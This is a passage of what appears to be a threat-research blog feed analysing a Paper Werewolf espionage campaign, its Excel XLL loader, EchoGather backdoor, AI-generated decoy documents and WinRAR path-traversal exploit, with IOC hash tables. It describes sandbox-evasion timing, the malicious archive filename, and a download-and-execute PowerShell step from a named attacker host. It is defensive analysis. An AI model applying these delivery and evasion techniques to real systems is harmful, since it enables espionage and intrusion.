&lt;td&gt;payload (static ELF)&lt;/td&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;26082cd36fdaf76ec0d74b7fbf455418c49fbab64b20892a873c415c3bb60675&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;loader&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;48a68d0555f850c36f7d338b1a42ed1a661043cacf2ba2a4b0a347fac3cb3ee6&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;dropper&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;fc2e0cb627a00d0e4509bd319271721ea74fb11150847213abe9e8fea060cc8a&lt;/td&gt;
&lt;td&gt;2024&lt;/td&gt;
&lt;td&gt;dropper&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8e83cbb2ed12faba9b452ea41291bcebdce08162f64ac9a5f82592df62f47613&lt;/td&gt;
&lt;td&gt;2025&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2b2eeb2271c19e2097a0ef0d90b2b615c20f726590bbfee139403db1dced5b0a&lt;/td&gt;
&lt;td&gt;2025&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;84828f31d741f92ce4bca98cfc2148ff8cff6663e2908a025b1386dd4953ffef&lt;/td&gt;
&lt;td&gt;2025&lt;/td&gt;
&lt;td&gt;payload (truncated)&lt;/td&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;090b15fd8912cab340b22e715d44db079ec641db5e2f92916aa1f2bc9236e03e&lt;/td&gt;
&lt;td&gt;2025&lt;/td&gt;
&lt;td&gt;dropper&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;64a3ebd3ad3927fc783f6ac020d5a6192e9778fb16b51cceba06e4ee5416adff&lt;/td&gt;
&lt;td&gt;2025&lt;/td&gt;
&lt;td&gt;dropper&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;b85ed15756568b85148c1d432a8920f81e4b21f2bc38f0cf51d06ced619e0e77&lt;/td&gt;
&lt;td&gt;2025&lt;/td&gt;
&lt;td&gt;dropper&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;d3d204c19d93e5e37697c7f80dd0de9f76a2fb4517ced9cafd7d7d46a6e285ba&lt;/td&gt;
&lt;td&gt;2025&lt;/td&gt;
&lt;td&gt;dropper&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;73b95b7d1006caf8d3477e4a9a0994eaa469e98b70b8c198a82c4a12c91ad49a&lt;/td&gt;
&lt;td&gt;2025&lt;/td&gt;
&lt;td&gt;infector&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;04c06be0f65d3ead95f3d3dd26fe150270ac8b58890e35515f9317fc7c7723c9&lt;/td&gt;
&lt;td&gt;2026&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;d7b487d2e840c4546661f497af0195614fc0906c03d187dc39815c811ea5ec3f&lt;/td&gt;
&lt;td&gt;2026&lt;/td&gt;
&lt;td&gt;payload&lt;/td&gt;
&lt;td&gt;A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;b982276458a85cd3dd7c8aa6cb4bbb2d4885b385053f92395a99abbfb0e43784&lt;/td&gt;
&lt;td&gt;2020&lt;/td&gt;
&lt;td&gt;RHOMBUS dropper&lt;/td&gt;
&lt;td&gt;-&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;</description></item><item><title>Tracing a Paper Werewolf Campaign Through Ai Generated Decoys and Excel Xlls</title><link>https://research.intezer.com/blog/2025/12/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/</link><pubDate>Fri, 19 Dec 2025 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2025/12/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/</guid><description>
&lt;p&gt;An XLL is a native Windows DLL that Excel loads as an add-in, allowing it to
execute arbitrary code through exported functions like xlAutoOpen. Since at
least mid-2017, threat actors began abusing Microsoft Excel add-ins via the
.XLL format, the earliest
&lt;a href="https://blog.talosintelligence.com/xlling-in-excel-malicious-add-ins/#:~:text=APT10%20%28menuPass%2C%20Chessmaster%2C%20Potassium"target="_blank" rel="noopener"&gt;documented&lt;/a&gt;
misuse is by the threat group APT10 (aka Stone Panda / Potassium) injecting
backdoor payloads via XLLs.&lt;/p&gt;
&lt;p&gt;Since 2021, a growing number of commodity malware families and cyber-crime
actors have added XLL-based delivery to their arsenals. Notable examples
include
&lt;a href="https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/"target="_blank" rel="noopener"&gt;Agent Tesla&lt;/a&gt;
and
&lt;a href="https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain/"target="_blank" rel="noopener"&gt;Dridex&lt;/a&gt;,
researchers observed
&lt;a href="https://threatresearch.ext.hp.com/hp-wolf-security-threat-insights-report-q4-2021/"target="_blank" rel="noopener"&gt;an increase&lt;/a&gt;
of these malware being dropped via malicious XLL add-ins.&lt;/p&gt;
&lt;p&gt;Attackers typically embed their malicious code in the standard add-in export
functions, such as xlAutoOpen. When a user enables the add-in in Excel, the
malicious payload executes automatically, dropping or downloading a malicious
payload. Some malware families use legitimate frameworks to create XLL (Excel
Add-in) files. One common example is &lt;a href="https://excel-dna.github.io/"target="_blank" rel="noopener"&gt;Excel-DNA&lt;/a&gt;,
a popular open-source framework.&lt;/p&gt;
&lt;p&gt;These frameworks make it easier for attackers to build and load malicious XLLs.
In some cases, they also allow threat actors to pack and execute additional
payloads directly in memory.&lt;/p&gt;
&lt;p&gt;In late October 2025, a 64-bit DLL compiled as an XLL add-in was submitted to
VirusTotal from two different countries. The first submission came from Ukraine
on October 26, followed by three separate submissions from Russia beginning on
October 27. The Russian-submitted samples were named Плановые цели
противника.xll (“enemy’s planned targets”) and Плановые цели противника НЕ
ЗАПУСКАТЬ.xll, which depending on context can mean either “Do NOT release the
enemy’s planned targets” or “Do NOT activate the enemy’s scheduled targets.”&lt;/p&gt;
&lt;p&gt;This DLL contains an embedded second-stage payload, a backdoor we named
EchoGather. Once launched, the backdoor collects system information,
communicates with a hardcoded command-and-control (C2) server, and supports
command execution and file transfer operations. While it uses the XLL format
for delivery, its execution chain and payload behavior differ from previously
documented threats abusing Excel add-ins. Through pivoting on infrastructure
and TTPs we were able to link this campaign to Paper Werewolf (aka GOFFEE), a
group that has been targeting Russian organizations.&lt;/p&gt;
&lt;h2&gt;Technical analysis&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Let’s dive in deeper.&lt;/p&gt;
&lt;h3&gt;What is an XLL?&lt;span class="hx:absolute hx:-mt-20" id="what-is-an-xll"&gt;&lt;/span&gt;
&lt;a href="#what-is-an-xll" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;An XLL is an Excel add-in implemented as a DLL that Excel loads directly,
usually with the .xll extension. Microsoft explicitly describes XLL files as a
DLL-style add-in that extends Excel with custom functions.&lt;/p&gt;
&lt;p&gt;When a user double clicks the file with the .xll extension, Excel is launched,
loads the DLL and calls its exported functions such as xlAutoOpen,
initialization code, or xlAutoClose, when unloading. Often malicious XLLs embed
their payload inside xlAutoOpen or through a secondary loader, so that code
runs immediately once Excel imports the DLL.&lt;/p&gt;
&lt;p&gt;Excel XLL add-ins and macros differ mainly in how they execute and the level of
control they provide an attacker. Macros, VBA or legacy XLM, run as scripts
inside Excel’s macro engine and are constrained by Microsoft’s security model,
which now includes blocking macros from the internet, signature requirements,
and multiple user-facing warnings. XLLs, on the other hand, are compiled DLLs
that Excel loads directly into its own process using LoadLibrary(), giving them
the full power of native code without going through macro security checks.
While macros rely on interpreted scripting and COM interactions, XLLs can call
any Windows API, inject into other processes, or act as full-featured malware
loaders. This makes XLLs far more capable and harder to analyze, and it may
explain why some threat actors chose XLL-based delivery methods rather than
macro-based.&lt;/p&gt;
&lt;h3&gt;Loader behavior&lt;span class="hx:absolute hx:-mt-20" id="loader-behavior"&gt;&lt;/span&gt;
&lt;a href="#loader-behavior" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The DLL exports two functions, xlAutoOpen and xlAutoClose, both of which return
zero. This behavior differs from that of legitimate XLL add-ins as well as from
previously documented threats abusing the XLL format, such as those described
in the most recent &lt;a href="https://cert.gov.ua/article/6285549"target="_blank" rel="noopener"&gt;CERT-UA&lt;/a&gt; publication.
In this case, the malicious logic is not tied to the typical export functions
but instead is triggered through dllmain. The main function of the loader is
called when fdwReason &amp;gt; 2 meaning that dllmain_dispatch was called with
&lt;a href="https://learn.microsoft.com/en-us/windows/win32/dlls/dllmain"target="_blank" rel="noopener"&gt;DLL_THREAD_DETACH&lt;/a&gt;
(=3). Essentially the main function will be called when any thread in Excel
that previously called into the XLL (even Excel’s own threads) exits.&lt;/p&gt;
&lt;p&gt;Triggering the malicious payload during DLL_THREAD_DETACH helps the malware
evade detection by delaying execution until a thread exits. This bypasses
typical behavior-based detection, which focuses on early-stage activity like
PROCESS_ATTACH, making the execution appear benign at first and allowing the
second-stage payload to activate covertly after the sandbox times out or AV
heuristics complete.&lt;/p&gt;
&lt;p&gt;SHA-256: &lt;code&gt;0506a6fcee0d4bf731f1825484582180978995a8f9b84fc59b6e631f720915da&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/12/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/images/fig1.png" title="A call to the function that loads and executes the backdoor." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;A call to the function that loads and executes the backdoor.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The embedded file is dropped as mswp.exe in &lt;code&gt;%APPDATA%\Microsoft\Windows&lt;/code&gt;, then
executed as a hidden process using CreateProcessW with CREATE_NO_WINDOW.
Standard Output and Error is captured and redirected via anonymous pipes. If
process creation succeeds, the function returns true otherwise, it cleans up
and returns false.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2025/12/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/images/fig2.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h3&gt;The backdoor: EchoGather&lt;span class="hx:absolute hx:-mt-20" id="the-backdoor-echogather"&gt;&lt;/span&gt;
&lt;a href="#the-backdoor-echogather" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;We refer to this backdoor as EchoGather due to its focus on system
reconnaissance and repeated beaconing behavior.&lt;/p&gt;
&lt;p&gt;SHA-256: &lt;code&gt;74fab6adc77307ef9767e710d97c885352763e68518b2109d860bb45e9d0a8eb&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The dropped payload is a 64-bit backdoor with hardcoded configuration and C2
address. It collects system information and communicates with the C2 over
HTTP(S) using the WinHTTP API.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/12/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/images/fig3.png" title="Main function of EchoGather." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Main function of EchoGather.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The data collected by EchoGather consists of:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;IPv4 addresses&lt;/li&gt;
&lt;li&gt;OS type (“Windows”)&lt;/li&gt;
&lt;li&gt;Architecture&lt;/li&gt;
&lt;li&gt;NetBIOS name&lt;/li&gt;
&lt;li&gt;Username&lt;/li&gt;
&lt;li&gt;Workstation domain&lt;/li&gt;
&lt;li&gt;Process ID&lt;/li&gt;
&lt;li&gt;Executable path&lt;/li&gt;
&lt;li&gt;Static version string: 1.1.1.1&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Next, EchoGather encodes that data using Base64 and sends it to the C2 using
POST method. The C2 address is constructed from hardcoded strings. In the
analyzed sample the C2 address was:
&lt;code&gt;https://fast-eda[.]my:443/dostavka/lavka/kategorii/zakuski/sushi/sety/skidki/regiony/msk/birylievo&lt;/code&gt;
This transmission occurs in an infinite loop with randomized sleep intervals
between 300–360 seconds.&lt;/p&gt;
&lt;p&gt;In all of its C2 communications, EchoGather uses the WinHTTP API. It supports
various proxy configurations and is designed to ignore SSL/TLS certificate
validation errors, allowing it to operate in environments with custom or
misconfigured proxy and certificate settings.&lt;/p&gt;
&lt;h4&gt;Supported commands&lt;span class="hx:absolute hx:-mt-20" id="supported-commands"&gt;&lt;/span&gt;
&lt;a href="#supported-commands" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;EchoGather supports four commands.&lt;/p&gt;
&lt;p&gt;All outgoing communication with the C2 is encoded using standard Base64. When a
command is received from the C2 the first 36 bytes contain the request ID, it’s
a unique identifier that is being used when the backdoor needs to send the
information is several packages.&lt;/p&gt;
&lt;h5&gt;0x54 Remote Command Execution&lt;span class="hx:absolute hx:-mt-20" id="0x54-remote-command-execution"&gt;&lt;/span&gt;
&lt;a href="#0x54-remote-command-execution" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;EchoGather first extracts the request ID, followed by the command that needs to
be executed. It then decrypts the string cmd.exe /C %s using a hardcoded XOR
key (0xCA), which serves as a template for command execution. Using this
template, it executes the specified command via cmd.exe. The output of the
command is captured through a pipe and sent back to the C2 server, with the
request ID prepended to the response.&lt;/p&gt;
&lt;h5&gt;0x45 Return Configuration&lt;span class="hx:absolute hx:-mt-20" id="0x45-return-configuration"&gt;&lt;/span&gt;
&lt;a href="#0x45-return-configuration" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;Sends the embedded configuration structure to the C2.&lt;/p&gt;
&lt;h5&gt;0x56 File Exfiltration&lt;span class="hx:absolute hx:-mt-20" id="0x56-file-exfiltration"&gt;&lt;/span&gt;
&lt;a href="#0x56-file-exfiltration" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;The backdoor begins by extracting a request ID and the name of the file to be
exfiltrated. It opens the specified file, determines its total size, and
calculates how many 512 KB chunks are required for transmission. A transfer
header containing metadata about the chunk count and size is then sent to the
C2 server. In response, the backdoor receives the request ID used to identify
the session. The file is read and transmitted in chunks, with each chunk
containing the request ID, chunk index, file tag, data length, and raw file
data.&lt;/p&gt;
&lt;h5&gt;0x57 Remote File Write&lt;span class="hx:absolute hx:-mt-20" id="0x57-remote-file-write"&gt;&lt;/span&gt;
&lt;a href="#0x57-remote-file-write" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;p&gt;EchoGather receives a filename from the C2 and writes the incoming data chunks
to the system, reconstructing the file as the chunks arrive.&lt;/p&gt;
&lt;h4&gt;Infrastructure analysis&lt;span class="hx:absolute hx:-mt-20" id="infrastructure-analysis"&gt;&lt;/span&gt;
&lt;a href="#infrastructure-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;During our research we found two domains that were used by the threat actors.&lt;/p&gt;
&lt;h5&gt;IP Resolutions for fast-eda.my:&lt;span class="hx:absolute hx:-mt-20" id="ip-resolutions-for-fast-edamy"&gt;&lt;/span&gt;
&lt;a href="#ip-resolutions-for-fast-edamy" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;ul&gt;
&lt;li&gt;The domain was registered on September 12, 2025.&lt;/li&gt;
&lt;li&gt;The very first resolution was between September 12th and 14th, the domain was
resolved to 199.59.243[.]228.&lt;/li&gt;
&lt;li&gt;After that and until November 26th all of the resolutions were on Cloudflare
instances.&lt;/li&gt;
&lt;li&gt;From September 18th to November 24th the domain was resolved to 172.64.80[.]1&lt;/li&gt;
&lt;li&gt;On November 27th it was resolved to 94.103.3[.]82 the address is connected to
Russia based on &lt;a href="https://db-ip.com/94.103.3.82"target="_blank" rel="noopener"&gt;geolocation&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;When we looked up the related files to this domain on VirusTotal, we found 7
files. Two of them are powershell scripts that load the backdoor: mswt.ps1 and
the second one wasn’t submitted with a name.&lt;/p&gt;
&lt;p&gt;The two scripts are identical, including their execution flow. Both first
decode two Base64-encoded files: a PDF document and the EchoGather payload. The
PDF is opened, while the payload is executed in the background. The document
appears to be an invitation, written in Russian, to a concert for high-ranking
officers. However, the PDF is AI-generated and contains several noticeable
inconsistencies. For instance, the stamp in the lower right corner appears to
be an AI-generated attempt at recreating Russia’s national emblem, the
double-headed eagle, but the result resembles a distorted or bird-like figure
rather than the intended symbol. The text also includes several errors. Some
Cyrillic letters are incorrect, for example, the letter Д is used in place of Л
in multiple instances, and the word праздиика is a misspelled version of
праздника. Additionally, the phrase «с глубоким уважением приглашает»
(translated as “with deep respect invites (you)”) is unnatural and not
idiomatic in the context of formal Russian invitations.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/12/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/images/fig4.png" title="Decoy document, and invite to a concert." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Decoy document, and invite to a concert.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h5&gt;IP Resolutions for ruzede.com&lt;span class="hx:absolute hx:-mt-20" id="ip-resolutions-for-ruzedecom"&gt;&lt;/span&gt;
&lt;a href="#ip-resolutions-for-ruzedecom" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h5&gt;&lt;ul&gt;
&lt;li&gt;First seen on 2025-05-21, resolved to 162.255.119[.]43 and later to
5.45.85[.]43 until October 2nd.&lt;/li&gt;
&lt;li&gt;On October 2nd it was resolved to IP addresses in Cloudflare.&lt;/li&gt;
&lt;li&gt;From October 4th to November 26th the domain was resolved to the same address
seen in the previous domain: 172.64.80[.]1&lt;/li&gt;
&lt;li&gt;On November 26th it was resolved to 193.233.18[.]137 in Russia based on
geolocation.&lt;/li&gt;
&lt;li&gt;The ip address is
&lt;a href="https://pilot.validin.com/detail?find=193.233.18.137&amp;amp;type=ip4&amp;amp;ref_id=fb75e539457#tab=resolutions"target="_blank" rel="noopener"&gt;linked&lt;/a&gt;
to different malicious domains.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Using VirusTotal, we pivoted on the domain ruzede[.]com, and we identified a
RAR archive that exploits a known vulnerability,
&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2025-8088"target="_blank" rel="noopener"&gt;CVE-2025-8088&lt;/a&gt;, a
vulnerability in WinRAR that involves the abuse of NTFS alternate data streams
(ADSes) in combination with path traversal. This flaw allows attackers to embed
malicious content within seemingly harmless filenames by appending ADSes that
include relative path traversal sequences.&lt;/p&gt;
&lt;p&gt;The archive contains a file named
Вх.письмо_Мипромторг.lnk:..&lt;em&gt;..&lt;/em&gt;..&lt;em&gt;..&lt;/em&gt;.._Roaming_Microsoft_Windows_run.bat&lt;/p&gt;
&lt;p&gt;When the archive is opened, WinRAR fails to properly sanitize these ADS paths
and extracts the hidden data streams, placing them in unintended or sensitive
locations such as %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/12/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/images/fig5.png" title="Connected file to the domain ruzede[.]com" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Connected file to the domain ruzede[.]com&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The phrase “письмо Мипромторг” is misspelled; the correct form is “письмо
Минпромторга.” This term refers to an official letter or communication issued
by the Ministry of Industry and Trade of the Russian Federation (Минпромторг
России). The same misspelling error is in the archive file name:
Вх.письмо_Мипромторг.rar.&lt;/p&gt;
&lt;p&gt;Essentially the file in the archive is a batch script that launches a hidden
PowerShell process. This process navigates to a user-specific AppData
directory, then downloads a PowerShell script named docc1.ps1 from a remote URL
(https://2k-linep[.]com/upload/docc1.ps1) and saves it to the current working
directory. The script is then executed via a new PowerShell instance with
execution policy restrictions bypassed.&lt;/p&gt;
&lt;p&gt;The downloaded script (docc1.ps1) extracts both a PDF file and an EchoGather
payload, using a technique similar to the one described previously. However, in
this instance, the embedded PDF differs from earlier samples. This document is
allegedly sent from the deputy of the Ministry of Industry and Trade of the
Russian Federation, asking for price justification documentation under the
state defense order, focusing on violations of deadlines and reporting on
pricing approval processes.&lt;/p&gt;
&lt;p&gt;The companies listed with their emails on the top right side of the first page
(Almaz-Antey, Shvabe, and the United Instrument-Making Corporation) are major
Russian defense-industry and high-technology enterprises, and they might be the
intended recipients of this decoy document.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/12/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/images/fig6.png" title="Page 1" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Page 1&lt;/figcaption&gt;
&lt;/figure&gt; &lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/12/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/images/fig7.png" title="Page 2" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Page 2&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/12/tracing-a-paper-werewolf-campaign-through-ai-generated-decoys-and-excel-xlls/images/fig8.png" title="Page 3" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Page 3&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The same vulnerability was used by several threat actors including
&lt;a href="https://www.malwarebytes.com/blog/news/2025/08/winrar-vulnerability-exploited-by-two-different-groups"target="_blank" rel="noopener"&gt;RomCom&lt;/a&gt;
(Russia-aligned) and Paper Werewolf, a cyberespionage group targeting Russian
organizations and active since 2022. In early August, BI.ZONE Threat
Intelligence published a
&lt;a href="https://bi.zone/expertise/blog/paper-werewolf-atakuet-rossiyu-s-ispolzovaniem-uyazvimosti-nulevogo-dnya-v-winrar/"target="_blank" rel="noopener"&gt;report&lt;/a&gt;
about an ongoing campaign of Paper Werewolf that exploits CVE-2025-6218,
affects WinRAR versions up to and including 7.11 and enables directory
traversal attacks that allow malicious archives to extract files outside their
intended directories. A second zero-day, at the time, vulnerability that abuses
ADSs for path traversal. The report doesn’t mention CVE-2025-8088, but based on
the description we assume that is the same vulnerability.&lt;/p&gt;
&lt;p&gt;The interesting part is that we can see similarities between the decoy
documents from the report to the document above. First, the filename of the
decoy document in the report is запрос Минпромторга РФ.pdf (Request of the
Ministry of Industry and Trade of the Russian Federation.pdf) no misspellings
in the filename. It refers to the same office. The document asks to assess the
impact of a specific government resolution on production capacities of subsidy
recipients. Next, both documents share the same template and structure: red
stamp on the left side, followed by the same information about the office, the
date and the request id. Both documents contain a request for information to be
submitted to a government-affiliated organization.&lt;/p&gt;
&lt;h2&gt;Attribution&lt;span class="hx:absolute hx:-mt-20" id="attribution"&gt;&lt;/span&gt;
&lt;a href="#attribution" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Based on the shared infrastructure, such as the ruzede[.]com domain, as well as
notable similarities in decoy document construction and the exploitation of the
WINRAR vulnerability that leverages ADSs, we attribute this campaign to the
Paper Werewolf (aka GOFFEE) threat group. The recent use of XLL files suggests
that the group is experimenting with new delivery methods while continuing to
rely on established infrastructure, possibly in an attempt to evade detection.
In addition, the use of a new, yet simple, backdoor may indicate an effort to
improve and evolve their toolset.&lt;/p&gt;
&lt;h2&gt;Summary&lt;span class="hx:absolute hx:-mt-20" id="summary"&gt;&lt;/span&gt;
&lt;a href="#summary" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;It’s less common to see public reporting on threats targeting Russian
organizations, which makes this campaign worth highlighting. The threat actor
appears to be actively exploring new methods to evade detection, including the
use of XLL-based delivery techniques and newly developed payloads. These
changes suggest an effort to enhance their capabilities. However, there are
still clear gaps in both technical execution and linguistic accuracy,
indicating that their tradecraft is still developing.&lt;/p&gt;
&lt;h2&gt;IOCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;XLL Loader&lt;span class="hx:absolute hx:-mt-20" id="xll-loader"&gt;&lt;/span&gt;
&lt;a href="#xll-loader" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;code&gt;0506a6fcee0d4bf731f1825484582180978995a8f9b84fc59b6e631f720915da&lt;/code&gt;&lt;/p&gt;
&lt;h3&gt;EchoGather Hashes and C2 Infrastructure&lt;span class="hx:absolute hx:-mt-20" id="echogather-hashes-and-c2-infrastructure"&gt;&lt;/span&gt;
&lt;a href="#echogather-hashes-and-c2-infrastructure" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;Variant 1&lt;span class="hx:absolute hx:-mt-20" id="variant-1"&gt;&lt;/span&gt;
&lt;a href="#variant-1" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;C2:
&lt;code&gt;https://ruzede[.]com/blogs/drafts/publish/schedule/seosso/login/mfa/verify/token/refresh/ips/blocklist/whitelist&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Files:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;c3e04bb4f4d51bb1ae8e67ce72aff1c3abeca84523ea7137379f06eb347e1669&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0d1dd7a62f3ea0d0fbeea905a48ae8794f49319ee0c34f15a3a871899404bf05&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Variant 2&lt;span class="hx:absolute hx:-mt-20" id="variant-2"&gt;&lt;/span&gt;
&lt;a href="#variant-2" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;C2:
&lt;code&gt;https://fast-eda.my/dostavka/lavka/kategorii/zakuski/sushi/sety/skidki/regiony/msk/birylievo&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Files:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;b2419afcfc24955b4439100706858d7e7fc9fdf8af0bb03b70e13d8eed52935c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;23d917781e288a6fa9a1296404682e6cf47f11f2a09b7e4f340501bf92d68514&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;dd5a16d0132eb38f64293b8419bab3a3a80f48dc050129a8752989539a5c97bf&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;74fab6adc77307ef9767e710d97c885352763e68518b2109d860bb45e9d0a8eb&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Other Files&lt;span class="hx:absolute hx:-mt-20" id="other-files"&gt;&lt;/span&gt;
&lt;a href="#other-files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;sha256&lt;/th&gt;
&lt;th&gt;File name (based on VirusTotal)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;b6914d702969bc92e8716ece92287c0f52fc129c6fb4796676a738b103a6e039&lt;/td&gt;
&lt;td&gt;mswt.ps1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;29101c580b33b77b51a6afe389955b151a4d0913716b253672cc0c0a41e5ccc8&lt;/td&gt;
&lt;td&gt;N/A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
